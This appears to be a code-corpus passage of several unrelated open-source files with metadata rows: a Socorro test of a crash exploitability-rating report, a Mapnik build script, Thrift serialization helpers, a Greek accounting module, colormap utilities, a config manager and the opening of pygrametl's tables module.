paramaters=['Traps', 'EH_Decay', 'E_Trap', 'TH_loss', 'G_Decay', 'G2_Decay', 'G3_Decay', 'GH_Decay', 'G_Escape', 'G3_Loss']
for i in range(dim):
print('{}{}: {} +- {}'.format(' ' * (8-len(paramaters[i])), paramaters[i], p0[i], np.sqrt(cv_array[i][i])))
with open('Parameters_{}.txt'.format(scale), 'w') as f:
writer = csv.writer(f, dialect="excel-tab")
for i in range(10):
error = np.sqrt(cv_array[i][i])
relerror = error / pi[i] * 100
words = '{}{}: {} +- {} ({}%)'.format(' ' * (8-len(paramaters[i])), paramaters[i], pi[i], error, relerror)
print(words)
writer.writerow([words])
if __name__ == '__main__':
main()
|
mit
| 8,866,360,628,721,313,000
| 35.295455
| 127
| 0.520726
| false
| 2.985047
| false
| false
| false
|
mozilla/socorro
|
webapp-django/crashstats/exploitability/tests/test_views.py
|
1
|
5320
|
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
import pyquery
from django.conf import settings
from django.urls import reverse
from crashstats.crashstats import models
from crashstats.crashstats.tests.test_views import BaseTestViews
from crashstats.supersearch.models import SuperSearchUnredacted
class TestViews(BaseTestViews):
def test_exploitability_report(self):
models.BugAssociation.objects.create(
bug_id=111111111, signature="FakeSignature 1"
)
models.BugAssociation.objects.create(
bug_id=222222222, signature="FakeSignature 3"
)
models.BugAssociation.objects.create(
bug_id=101010101, signature="FakeSignature"
)
url = reverse("exploitability:report")
queried_versions = []
def mocked_supersearch_get(**params):
assert params["product"] == ["WaterWolf"]
queried_versions.append(params.get("version"))
assert params["_aggs.signature"] == ["exploitability"]
assert params["_facets_size"] == settings.EXPLOITABILITY_BATCH_SIZE
assert params["exploitability"]
assert params["_fields"]
facets = [
{
"count": 229,
"facets": {
"exploitability": [
{"count": 210, "term": "none"},
{"count": 19, "term": "low"},
]
},
"term": "FakeSignature 1",
},
{
"count": 124,
"facets": {
"exploitability": [
{"count": 120, "term": "none"},
{"count": 1, "term": "high"},
{"count": 4, "term": "interesting"},
]
},
"term": "FakeSignature 3",
},
{
"count": 104,
"facets": {
"exploitability": [
{"count": 93, "term": "low"},
{"count": 11, "term": "medium"},
]
},
"term": "Other Signature",
},
{
"count": 222,
"facets": {
"exploitability": [
# one that doesn't add up to 4
{"count": 10, "term": "null"},
{"count": 20, "term": "none"},
]
},
"term": "FakeSignature",
},
]
return {"facets": {"signature": facets}, "hits": [], "total": 1234}
SuperSearchUnredacted.implementation().get.side_effect = mocked_supersearch_get
response = self.client.get(url, {"product": "WaterWolf"})
assert response.status_code == 302
user = self._login()
response = self.client.get(url, {"product": "WaterWolf"})
assert response.status_code == 302
group = self._create_group_with_permission("view_exploitability")
user.groups.add(group)
assert user.has_perm("crashstats.view_exploitability")
# unrecognized product
response = self.client.get(url, {"product": "XXXX"})
assert response.status_code == 404
# unrecognized version
response = self.client.get(url, {"product": "WaterWolf", "version": "0000"})
assert response.status_code == 400
# valid version but not for WaterWolf
response = self.client.get(url, {"product": "WaterWolf", "version": "1.5"})
assert response.status_code == 400
# if you omit the product, it'll redirect and set the default product
response = self.client.get(url)
assert response.status_code == 302
assert response["Location"].endswith(
url + "?product=%s" % settings.DEFAULT_PRODUCT
)
response = self.client.get(url, {"product": "WaterWolf", "version": "19.0"})
assert response.status_code == 200
doc = pyquery.PyQuery(response.content)
# We expect a table with 3 different signatures
# The signature with the highest high+medium count is
# 'Other Signature' etc.
tds = doc("table.data-table tbody td:first-child a")
texts = [x.text for x in tds]
assert texts == ["Other Signature", "FakeSignature 3", "FakeSignature 1"]
# The first signature doesn't have any bug associations,
# but the second and the third does.
rows = doc("table.data-table tbody tr")
texts = [[x.text for x in doc("td.bug_ids_more a", row)] for row in rows]
expected = [[], ["222222222"], ["111111111"]]
assert texts == expected
assert queried_versions == [["19.0"]]
response = self.client.get(url, {"product": "WaterWolf"})
assert response.status_code == 200
assert queried_versions == [["19.0"], None]
|
mpl-2.0
| -6,342,788,906,215,783,000
| 37.550725
| 87
| 0.509023
| false
| 4.493243
| true
| false
| false
|
mapycz/mapnik
|
utils/mapnik-index/build.py
|
1
|
2028
|
#
# This file is part of Mapnik (c++ mapping toolkit)
#
# Copyright (C) 2015 Artem Pavlenko
#
# Mapnik is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
#
#
import os
import glob
from copy import copy
Import ('env')
Import ('plugin_base')
program_env = plugin_base.Clone()
source = Split(
"""
mapnik-index.cpp
process_csv_file.cpp
process_geojson_file.cpp
../../plugins/input/csv/csv_utils.cpp
"""
)
headers = env['CPPPATH']
libraries = [env['MAPNIK_NAME']]
# need on linux: https://github.com/mapnik/mapnik/issues/3145
libraries.append('mapnik-json')
libraries.append('mapnik-wkt')
libraries.append(env['ICU_LIB_NAME'])
libraries.append(env['BOOST_LIB_PATHS']['system'])
libraries.append(env['BOOST_LIB_PATHS']['program_options'])
if env['RUNTIME_LINK'] == 'static':
libraries.extend(copy(env['LIBMAPNIK_LIBS']))
if env['PLATFORM'] == 'Linux':
libraries.append('dl')
mapnik_index = program_env.Program('mapnik-index', source, CPPPATH=headers, LIBS=libraries)
Depends(mapnik_index, env.subst('../../src/%s' % env['MAPNIK_LIB_NAME']))
if 'uninstall' not in COMMAND_LINE_TARGETS:
env.Install(os.path.join(env['INSTALL_PREFIX'],'bin'), mapnik_index)
env.Alias('install', os.path.join(env['INSTALL_PREFIX'],'bin'))
env['create_uninstall_target'](env, os.path.join(env['INSTALL_PREFIX'],'bin','mapnik-index'))
|
lgpl-2.1
| 6,641,049,399,856,726,000
| 31.190476
| 93
| 0.711045
| false
| 3.335526
| false
| false
| false
|
ashishb/benchmarking
|
serialization/exec_thrift.py
|
1
|
1364
|
import os
import random
import sys
sys.path.append(os.path.join(os.getcwd(), 'gen-py'))
from thrift.protocol import TBinaryProtocol
from thrift.transport import TTransport
# Generated using
# thrift -o . --gen py:new_style student.thrift
from student.ttypes import Course
from student.ttypes import Student
# Based on http://wiki.apache.org/thrift/ThriftUsagePython
def getNewStudent(i, num_courses):
new_student = Student()
new_student.id = random.randint(0, i)
new_student.first_name = str(random.randint(0, i))
new_student.last_name = str(random.randint(0, i))
new_student.comments = str(random.randint(0, i))
new_student.courses = list()
for j in xrange(0, num_courses):
new_course = Course()
new_course.name = str(random.randint(0, i)) + str(random.randint(0, j))
new_course.marks = 100 * random.randint(0, j) / num_courses
new_student.courses.append(new_course)
return new_student
def serialize(student):
student.validate()
transport_out = TTransport.TMemoryBuffer()
protocol_out = TBinaryProtocol.TBinaryProtocol(transport_out)
student.write(protocol_out)
bytes = transport_out.getvalue()
return bytes
def deserialize(serialized_student):
transport_in = TTransport.TMemoryBuffer(serialized_student)
protocol_in = TBinaryProtocol.TBinaryProtocol(transport_in)
student = Student()
student.read(protocol_in)
return student
|
apache-2.0
| -2,492,919,796,256,315,400
| 29.311111
| 73
| 0.756598
| false
| 3.239905
| false
| false
| false
|
tedlaz/pyted
|
pylogistiki/book.py
|
1
|
17624
|
'''Basic module for accounting'''
import utils as ul
import parse_singularo_afm as pafm
FORMAT_LINE = '%-15s %12s %12s'
SPLIT_CHAR = '.'
LM1 = ul.read_txt_to_dict('log_sxedio.txt')
def parse_afm_5398(file='afm-5398.txt'):
afmdic = {}
pfpadic = {}
with open(file) as fle:
for line in fle:
lmos, afm, pfpa, _ = line.split('|')
afmdic[lmos] = afm
pfpadic[lmos] = ul.dec(ul.dec(pfpa) / ul.dec(100))
return afmdic, pfpadic
def date2period(isodate):
year, month, _ = isodate.split('-')
imonth = int(month)
if imonth <= 3:
return '%s-%s-%s' % (year, '03', '31')
elif imonth <= 6:
return '%s-%s-%s' % (year, '06', '30')
elif imonth <= 9:
return '%s-%s-%s' % (year, '09', '30')
elif imonth <= 12:
return '%s-%s-%s' % (year, '12', '31')
else:
return '%s-%s-%s' % (year, '12', '31')
class Line():
def __init__(self, lmo, xre, pis):
assert xre + pis != 0
self.lmo = lmo
self.xre = ul.dec(xre)
self.pis = ul.dec(pis)
def lmop(self, lmodic):
return lmodic.get(self.lmo, self.lmo)
@property
def typos(self):
typ = set()
if self.lmo.startswith('1'):
typ.add('ΠΑΓΙΑ')
typ.add('ΕΕ')
typ.add('1')
if self.lmo.startswith('2'):
typ.add('ΑΠΟΘΕΜΑΤΑ')
typ.add('ΕΕ')
typ.add('ΕΕ ΕΞΟΔΑ')
typ.add('2')
if self.lmo.startswith('20'):
typ.add('ΕΜΠΟΡΕΥΜΑΤΑ')
if self.lmo.startswith('20.00'):
typ.add('ΑΠΟΓΡΑΦΗ ΕΜΠΟΡΕΥΜΑΤΩΝ')
if self.lmo.startswith('20.01'):
typ.add('ΑΓΟΡΕΣ ΕΜΠΟΡΕΥΜΑΤΩΝ')
typ.add('ΑΓΟΡΕΣ')
if self.lmo.startswith('24.01'):
typ.add("ΑΓΟΡΕΣ Α' ΚΑΙ Β' ΥΛΩΝ")
typ.add('ΑΓΟΡΕΣ')
if self.lmo.startswith('3'):
typ.add('ΑΠΑΙΤΗΣΕΙΣ')
typ.add('3-5')
if self.lmo.startswith('38'):
typ.add('ΜΕΤΡΗΤΑ')
if self.lmo.startswith('4'):
typ.add('ΚΕΦΑΛΑΙΟ')
if self.lmo.startswith('5'):
typ.add('ΥΠΟΧΡΕΩΣΕΙΣ')
typ.add('3-5')
if self.lmo.startswith('50'):
typ.add('ΠΡΟΜΗΘΕΥΤΕΣ')
if self.lmo.startswith('54.00'):
typ.add('ΦΠΑ')
typ.add('54.00')
if self.lmo.startswith('6'):
typ.add('ΕΞΟΔΑ')
typ.add('ΕΕ')
typ.add('ΕΕ ΕΞΟΔΑ')
typ.add('6')
if self.lmo.startswith('7'):
typ.add('ΕΣΟΔΑ')
typ.add('ΠΩΛΗΣΕΙΣ')
typ.add('ΕΕ')
typ.add('ΕΕ ΕΣΟΔΑ')
typ.add('7')
if self.lmo.startswith('70'):
typ.add('ΠΩΛΗΣΕΙΣ ΕΜΠΟΡΕΥΜΑΤΩΝ')
if self.lmo.startswith('71'):
typ.add('ΠΩΛΗΣΕΙΣ ΠΡΟΪΟΝΤΩΝ')
if self.lmo.startswith('8'):
typ.add('ΑΝΟΡΓΑΝΑ')
return typ
def is_typos(self, typos):
return typos in self.typos
def has_tag(self, tag):
return tag in self.typos
@property
def is_xreostiko(self):
return self.y > 0
@property
def y(self):
return self.xre - self.pis
@property
def gy(self):
return ul.dec2gr(self.y)
@property
def gxre(self):
return ul.dec2gr(self.xre)
@property
def gpis(self):
return ul.dec2gr(self.pis)
@property
def hierarchy(self):
assert len(self.lmo) > 1
listlmo = self.lmo.split(SPLIT_CHAR)
listfinal = ['t']
if self.lmo[0] in '267':
listfinal.append('t267')
elif self.lmo[0] in '35':
listfinal.append('t35')
listfinal.append(self.lmo[0])
tmp = ''
for el in listlmo:
if tmp == '':
tmp = el
else:
tmp = SPLIT_CHAR.join([tmp, el])
listfinal.append(tmp)
return listfinal
def __str__(self):
return FORMAT_LINE % (self.lmo, self.gxre, self.gpis)
class Arthro():
def __init__(self, dat, par, per, lines=None):
self.dat = dat
self.par = par
self.per = per
if lines:
self.z = lines
else:
self.z = []
def similarities(self):
'''Find similarities between accounts'''
print(', '.join([lm.lmo for lm in self.z]))
@property
def typos(self):
tset = set()
for line in self.z:
tset = tset.union(line.typos)
# if {'ΦΠΑ', 'ΑΓΟΡΕΣ'}.issubset(tset):
# tset.add('ΑΓΟΡΕΣ ΜΕ ΦΠΑ')
# if {'ΑΓΟΡΕΣ', 'ΠΡΟΜΗΘΕΥΤΕΣ'}.issubset(tset):
# tset.add('ΑΓΟΡΕΣ ΕΠΙ ΠΙΣΤΩΣΕΙ')
return tset
@property
def ee_typos(self):
if 'ΕΕ ΕΣΟΔΑ' in self.typos:
return '7'
elif 'ΕΕ ΕΞΟΔΑ' in self.typos:
return '26'
elif '1' in self.typos:
return '1'
else:
return 'ΛΑΘΟΣ'
@property
def ee_synt(self):
if 'ΕΕ ΕΣΟΔΑ' in self.typos:
return ul.dec(-1)
elif 'ΕΕ ΕΞΟΔΑ' in self.typos:
return ul.dec(1)
elif '1' in self.typos:
return ul.dec(1)
else:
return ul.dec(0)
def is_typos(self, typos):
return typos in self.typos
@property
def lmoi(self):
'''List with arthro lmoi'''
return [line.lmo for line in self.z]
@property
def zlines(self):
'''Number of lines'''
return len(self.z)
def add(self, line):
self.z.append(line)
@property
def val(self):
return sum([line.xre for line in self.z])
@property
def is_complete(self):
total = sum([line.y for line in self.z])
abstotal = sum([abs(line.y) for line in self.z])
return total == 0 and abstotal > 0
def __str__(self):
ast = '%s %s %s\n' % (self.dat, self.par, self.per)
txr = tpi = ul.dec(0)
for line in self.z:
ast += ' %s\n' % line
txr += line.xre
tpi += line.pis
ast += ' ' + FORMAT_LINE % ('Σύνολο', txr, tpi)
return ast
class Book():
def __init__(self, lmoi=None, arthra=None):
# self.lmoi = lmoi
self.lmoi = {**lmoi, **LM1}
self.arthra = arthra
def add_arthro(self, arthro):
self.arthra.append(arthro)
for lmo in arthro.lmoi:
if lmo not in self.lmoi:
self.lmoi[lmo] = {}
@property
def typoi(self):
typoi = set()
for arthro in self.arthra:
typoi = typoi.union(arthro.typos)
return typoi
def isozygio(self, apo, eos, typos=None):
isoz = {}
for arthro in self.arthra:
if not apo <= arthro.dat <= eos:
continue
if typos and not arthro.is_typos(typos):
continue
for line in arthro.z:
for lmo in line.hierarchy:
isoz[lmo] = isoz.get(lmo, ul.dec(0)) + line.y
return isoz
def isozygio_print(self, apo, eos, typos=None):
isoz = self.isozygio(apo, eos, typos)
tst = '%-20s %-50s %12s'
print('Ισοζύγιο από %s έως %s %s' % (apo, eos, typos or 'ΟΛΑ'))
for lmo in sorted(isoz):
print(tst % (lmo, self.lmoi.get(lmo, lmo), isoz[lmo]))
def kartella(self, lmos, apo, eos):
fdata = []
total = ul.dec(0)
before = ul.dec(0)
after = ul.dec(0)
for arthro in self.arthra:
for line in arthro.z:
if lmos in line.hierarchy:
if arthro.dat < apo:
before += line.y
elif arthro.dat > eos:
after += line.y
else:
total += line.y
fdata.append((arthro.dat, arthro.par, arthro.per,
line.xre, line.pis, total))
return fdata, before, after
def kartella_print(self, lmos, apo, eos):
data, before, after = self.kartella(lmos, apo, eos)
ast = 'Καρτέλλα Λογαριασμού %s %s (Άπό: %s Έως: %s)'
print(ast % (lmos, self.lmoi[lmos], apo, eos))
print('%-139s %12s' % ('Υπόλοιπο από μεταφορά', before))
for dat in data:
# print(len(dat[2]))
print('%-10s %-26s %-75s %12s %12s %12s' % dat)
def fpa(self, apo, eos):
'''
1.Επιλέγουμε τα άρθρα που έχουν φπα
2.Ελέγχουμε αν υπάρχουν παραπάνω από ένας γραμμές με φπα
Στην απλή περίπτωση που έχουμε ένα μια γραμμή ΦΠΑ και μια γραμμή
1267 τότε βρίσκουμε το ποσοστό κάνοντας διάρεση φπα 54.00 / 1267
το ποσοστό θα πρέπει να είναι ένα απο τα γνωστά ποσοστά 13, 24
προσθέτουμε το λογαρισμό στην κατηγορία που πρέπει
'''
pass
def arthra_print(self, typos=None):
headt = "%-6s %-10s %s %s %s"
lit = " %-12s %-40s %12s %12s"
i = 0
for art in self.arthra:
if typos and typos not in art.typos:
continue
i += 1
print(headt % (i, art.dat, art.par, art.per, art.typos))
for lin in art.z:
print(lit % (lin.lmo, self.lmoi.get(lin.lmo, lin.lmo),
lin.xre, lin.pis))
print('')
def eebook(self):
i = 0
lins = []
for art in self.arthra:
if 'ΕΕ' not in art.typos:
continue
i += 1
poso = ul.dec(0)
fpa = ul.dec(0)
lmo = ''
for line in art.z:
if '54.00' in line.typos:
fpa += ul.dec(line.y * art.ee_synt)
elif '1' in line.typos:
poso += ul.dec(line.xre * art.ee_synt)
elif '2' in line.typos:
poso += ul.dec(line.y * art.ee_synt)
elif '6' in line.typos:
poso += ul.dec(line.y * art.ee_synt)
elif '7' in line.typos:
poso += ul.dec(line.y * art.ee_synt)
elif '3-5' in line.typos:
lmo = line.lmo
else:
pass
lins.append({'aa': i, 'date': art.dat, 'typ': art.ee_typos,
'par': art.par, 'per': art.per, 'poso': poso,
'fpa': fpa, 'tot': art.val, 'lmo': lmo})
return lins
def eebook_print(self, eefile):
afms = pafm.parsefile(eefile)
a5398, _ = parse_afm_5398()
l5398 = []
eedata = self.eebook()
stc = ('{aa:<5}{date} {typ:2} {lmo:12} {par:22} {afm:9} {per:30} {es:12}'
'{esf:12} {est:12} {ej:12} {ejf:12} {ejt:12}')
te = ul.dec(0)
tj = ul.dec(0)
total_paroxi = 0
for line in eedata:
line['per'] = line['per'][:30] if len(line['per']) > 29 else line['per']
per_name = line['per'][:14] if len(line['per']) > 14 else line['per']
per_name = per_name.split('-')[0].strip()
line['afm'] = afms[per_name] if per_name in afms else ''
if line['lmo'].startswith('53.98.'):
line['afm'] = a5398.get(line['lmo'], ' ??? ')
if line['lmo'] not in l5398:
if line['lmo'] not in a5398:
l5398.append(line['lmo'])
if line['per'].startswith('ΑΠΟΔΕΙΞΗ ΛΙΑΝΙΚΗΣ ΠΩΛΗΣΗΣ'):
line['afm'] = '1'
if line['per'].startswith('ΑΠΟΔΕΙΞΗ ΠΑΡΟΧΗΣ ΥΠΗΡΕΣΙΩΝ'):
line['afm'] = ' ? '
total_paroxi += 1
if line['typ'] == '7':
line['es'] = line['poso']
line['ej'] = '' # ul.dec(0)
line['esf'] = line['fpa']
line['ejf'] = '' # ul.dec(0)
te += line['poso']
line['te'] = te
line['tj'] = '' # tj
line['est'] = line['tot']
line['ejt'] = ''
else:
line['es'] = '' # ul.dec(0)
line['ej'] = line['poso']
line['esf'] = '' # ul.dec(0)
line['ejf'] = line['fpa']
tj += line['poso']
line['te'] = '' # te
line['tj'] = tj
line['est'] = ''
line['ejt'] = line['tot']
print(stc.format(**line))
l5398.sort()
if l5398:
print('Λογαριασμοί που λείπουν ΑΦΜ:', l5398)
print('Esoda : %s Ejoda : %s paroxi: %s' % (te, tj, total_paroxi))
def eebook_myf(self, eefile):
afms = pafm.parsefile(eefile)
a5398, pfpa5398 = parse_afm_5398()
l5398 = []
eedata = self.eebook()
te = ul.dec(0)
tj = ul.dec(0)
total_paroxi = 0
lines = []
for line in eedata:
line['mdate'] = date2period(line['date'])
line['per'] = line['per'][:30] if len(line['per']) > 29 else line['per']
per_name = line['per'][:14] if len(line['per']) > 14 else line['per']
per_name = per_name.split('-')[0].strip()
line['afm'] = afms[per_name] if per_name in afms else ''
if line['lmo'].startswith('53.98.'):
line['afm'] = a5398.get(line['lmo'], ' ??? ')
if line['lmo'] not in l5398:
if line['lmo'] not in a5398:
l5398.append(line['lmo'])
if line['per'].startswith('ΑΠΟΔΕΙΞΗ ΛΙΑΝΙΚΗΣ ΠΩΛΗΣΗΣ'):
line['afm'] = '1'
if line['per'].startswith('ΑΠΟΔΕΙΞΗ ΠΑΡΟΧΗΣ ΥΠΗΡΕΣΙΩΝ'):
line['afm'] = ' ? '
total_paroxi += 1
if line['typ'] == '7':
line['es'] = line['poso']
line['ej'] = '' # ul.dec(0)
line['esf'] = line['fpa']
line['ejf'] = '' # ul.dec(0)
te += line['poso']
line['te'] = te
line['tj'] = '' # tj
line['est'] = line['tot']
line['ejt'] = ''
if line['afm'] == '1':
line['myft'] = '3cash'
elif line['afm']:
line['myft'] = '1rev'
else:
line['myft'] = ' rev '
else:
line['es'] = '' # ul.dec(0)
line['ej'] = line['poso']
line['esf'] = '' # ul.dec(0)
line['ejf'] = line['fpa']
tj += line['poso']
line['te'] = '' # te
line['tj'] = tj
line['est'] = ''
line['ejt'] = line['tot']
if line['afm'].strip():
line['myft'] = '2exp'
elif line['lmo'].startswith('53.98.'):
line['myft'] = '4oexp'
else:
line['myft'] = 'exp'
if line['fpa'] != 0:
print('Error', line)
if line['poso'] < 0:
line['decr'] = 'credit'
line['mposo'] = -1 * line['poso']
line['mfpa'] = -1 * line['fpa']
else:
line['decr'] = 'normal'
line['mposo'] = line['poso']
line['mfpa'] = line['fpa']
if line['mfpa'] == 0 and line['lmo'] in pfpa5398:
poso = ul.dec(line['mposo'] / (1 + pfpa5398[line['lmo']]))
fpa = line['mposo'] - poso
line['mposo'] = poso
line['mfpa'] = fpa
lines.append(line)
l5398.sort()
if l5398:
print('Λογαριασμοί που λείπουν ΑΦΜ:', l5398)
return lines
def myf(self, lines):
pass
def eebook_totals(self, apo, eos):
eedata = self.eebook()
eposo = efpa = xposo = xfpa = ul.dec(0)
for line in eedata:
if not (apo <= line['date'] <= eos):
continue
if line['typ'] == '7':
eposo += line['poso']
efpa += line['fpa']
elif line['typ'] in ('26', '1'):
xposo += line['poso']
xfpa += line['fpa']
else:
print('Error')
print('Σύνολα για περίοδο από %s έως %s' % (apo, eos))
print('Έσοδα : %15s ΦΠΑ: %15s' % (eposo, efpa))
print('Έξοδα : %15s ΦΠΑ: %15s' % (xposo, xfpa))
print('Διαφορά: %15s %15s' % (eposo - xposo, efpa - xfpa))
def __str__(self):
stf = ''
for arthro in self.arthra:
stf += '%s\n' % arthro.__str__()
return stf
|
gpl-3.0
| -1,884,717,183,715,299,000
| 31.927451
| 84
| 0.450009
| false
| 2.680019
| false
| false
| false
|
leobrowning92/generative-art
|
colormap.py
|
1
|
3108
|
import os
import cairo as cairo
import numpy as np
from render import Animate, Image_Creator
import matplotlib.cm as cm
def random_rgb_color(alpha=1):
return [np.random.uniform(0,1),np.random.uniform(0,1), np.random.uniform(0,1),alpha]
def linear_gradient(start,finish,n=10,alpha=1):
gradient=[0]*n
gradient[0]=start
for i in range(1,n):
gradient[i]=[start[j]+i*(finish[j]-start[j])/float(n) for j in range(3)]+[alpha]
return gradient
def polylinear_gradient(colors,spacing,total_steps,alpha=1):
"""colors is a list of rgb colors, with spacing being the
relative positions of the colors along the gradientself.
spacings are thus sequential numbers between 0 and 1
where the first and last items must be 0 and 1 respectively"""
assert len(colors)==len(spacing), "every color must have a corresponding spacing"
assert total_steps>=2*len(colors) #soft cap on num of colors wrt n
gradient=[]
for i in range(len(colors)-1):
gradient= gradient + linear_gradient(colors[i], colors[i+1], spacing[i+1] -spacing[i],alpha=alpha )
assert len(gradient)==total_steps
return gradient
def hex_to_rgb(hex):
return [int(hex[i:i+2]) for i in range(1,6,2)]
def random_colormap(number_of_colors,total_steps, even=True,v=True,alpha=1):
colors=[]
spacing=[0]
for i in range(number_of_colors):
colors.append(random_rgb_color(alpha=alpha))
if even:
spacing=np.linspace(0,total_steps,num=number_of_colors,dtype=int)
else:
for i in range(number_of_colors-2):
spacing.append(np.random.uniform(0.01,0.99))
spacing.append(1)
if v:
print("colors:")
for i in colors:
print(*i)
print("spacing:\n", *sorted(spacing))
return polylinear_gradient(colors,sorted(spacing),total_steps,alpha=alpha)
if __name__ == '__main__':
os.chdir(os.path.dirname(os.path.realpath(__file__)))
# These are the required arguments for the Animation
background_color = [1, 1, 1, 1]
image_size = [200,200]
unit=1.0/max(image_size)
total_steps=max(image_size)
#foreground_colors=linear_gradient([.5,0,.5],[1,1,0],n=image_size)
#foreground_colors=random_colormap(3,total_steps,even=False)
colors=np.genfromtxt(fname='sourceimages/IMG_9308_kmean6.dat',skip_header=1,delimiter=',')
foreground_colors=polylinear_gradient(colors,np.linspace(0,total_steps,num=len(colors),dtype=int) ,total_steps)
def step_function(self):
# render.clear_canvas()
self.line([self.steps*unit,0],[self.steps*unit,1],width=unit)
return True
show=True
if show:
# These are the bits that need to be run when calling the Animation
render = Animate(image_size, background_color, foreground_colors, step_function, interval=100, save=False, stop=total_steps)
render.start()
else:
#this is what needs to be run to produce an image without animation
image=Image_Creator(image_size, background_color, foreground_colors, step_function, stop=total_steps)
image.create()
|
gpl-3.0
| 146,574,262,081,108,060
| 34.318182
| 132
| 0.67278
| false
| 3.363636
| false
| false
| false
|
buxx/synergine
|
synergine/core/config/ConfigurationManager.py
|
1
|
2347
|
from synergine.core.exception.NotFoundError import NotFoundError
class ConfigurationManager():
"""
Management of dict based configuration data
"""
def __init__(self, config: dict={}):
self._configs = config
def get(self, config_name: "the.config.name", default=None):
inceptions = config_name.split('.')
config = self._configs
for inception in inceptions:
if inception in config:
config = config[inception]
elif default is not None:
return default
else:
raise NotFoundError('Config "'+config_name+'"" not found')
return config
def update_config(self, config_name: "the.config.name", config_value):
inceptions = config_name.split('.')
inception_count = 0
parent_config = self._configs
config = self._configs
for inception in inceptions:
inception_count += 1
if inception in config:
parent_config = config
config = config[inception]
else:
raise Exception('Config "'+config_name+'"" not found')
parent_config[inception] = config_value
def set_config(self, config_name: "the.config.name", config_value):
inceptions = config_name.split('.')
config = self._configs
for inception in inceptions:
if inception in config:
config = config[inception]
elif inceptions.index(inception)+1 == len(inceptions):
config[inception] = config_value
else:
config[inception] = {inceptions.__getitem__(inceptions.index(inception)+1): {}}
config = config[inception]
def load(self, config_to_load):
self._configs = self._merge(self._configs, config_to_load)
def _merge(self, a, b, path=None):
"merges b into a"
if path is None:
path = []
for key in b:
if key in a:
if isinstance(a[key], dict) and isinstance(b[key], dict):
self._merge(a[key], b[key], path + [str(key)])
elif a[key] == b[key]:
pass
else:
a[key] = b[key]
else:
a[key] = b[key]
return a
|
apache-2.0
| -4,210,175,498,560,973,300
| 34.044776
| 95
| 0.536003
| false
| 4.267273
| true
| false
| false
|
jpercent/pygrametl
|
pygrametl/tables.py
|
1
|
122529
|
"""This module contains classes for looking up rows, inserting rows
and updating rows in dimensions and fact tables. Rows are represented
as dictionaries mapping between attribute names and attribute values.
Many of the class methods take an optional 'namemapping' argument which is
explained here, but not repeated in the documentation for the individual
methods: Consider a method m which is given a row r and a namemapping n.
Assume that the method m uses the attribute a in r (i.e., r[a]). If the
attribute a is not in the namemapping, m will just use r[a] as expected.
But if the attribute a is in the namemapping, the name a is mapped to
another name and the other name is used. That means that m then uses
r[n[a]]. This is practical if attribute names in the considered rows and
DW tables differ. If, for example, data is inserted into an order dimension
in the DW that has the attribute order_date, but the source data uses the
attribte name date, we can use a name mapping from order_date to date:
dim.insert(row=..., namemapping={'order_date':'date'})
"""
# Copyright (c) 2009-2015, Aalborg University (chr@cs.aau.dk)
# All rights reserved.
# Redistribution and use in source anqd binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# - Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# - Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import locale
from subprocess import Popen, PIPE
from sys import version_info
import tempfile
from time import sleep
import types
import pygrametl
from pygrametl.FIFODict import FIFODict
import pygrametl.parallel
try:
from functools import reduce
except ImportError:
# Jython 2.5.X specific code
pass
__author__ = "Christian Thomsen"
__maintainer__ = "Christian Thomsen"
__version__ = '2.4.0a'
__all__ = ['Dimension', 'CachedDimension', 'BulkDimension',
'CachedBulkDimension', 'TypeOneSlowlyChangingDimension',
'SlowlyChangingDimension', 'SnowflakedDimension', 'FactTable',
'BatchFactTable', 'BulkFactTable', 'SubprocessFactTable',
'DecoupledDimension', 'DecoupledFactTable', 'BasePartitioner',
'DimensionPartitioner', 'FactTablePartitioner']
class Dimension(object):
"""A class for accessing a dimension. Does no caching."""
def __init__(self, name, key, attributes, lookupatts=(),
idfinder=None, defaultidvalue=None, rowexpander=None,
targetconnection=None):
"""Arguments:
- name: the name of the dimension table in the DW
- key: the name of the primary key in the DW
- attributes: a sequence of the attribute names in the dimension
table. Should not include the name of the primary key which is
given in the key argument.
- lookupatts: A subset of the attributes that uniquely identify
a dimension members. These attributes are thus used for looking
up members. If not given, it is assumed that
lookupatts = attributes
- idfinder: A function(row, namemapping) -> key value that assigns
a value to the primary key attribute based on the content of the
row and namemapping. If not given, it is assumed that the primary
key is an integer, and the assigned key value is then the current
maximum plus one.
- defaultidvalue: An optional value to return when a lookup fails.
This should thus be the ID for a preloaded "Unknown" member.
- rowexpander: A function(row, namemapping) -> row. This function
is called by ensure before insertion if a lookup of the row fails.
This is practical if expensive calculations only have to be done
for rows that are not already present. For example, for a date
dimension where the full date is used for looking up rows, a
rowexpander can be set such that week day, week number, season,
year, etc. are only calculated for dates that are not already
represented. If not given, no automatic expansion of rows is
done.
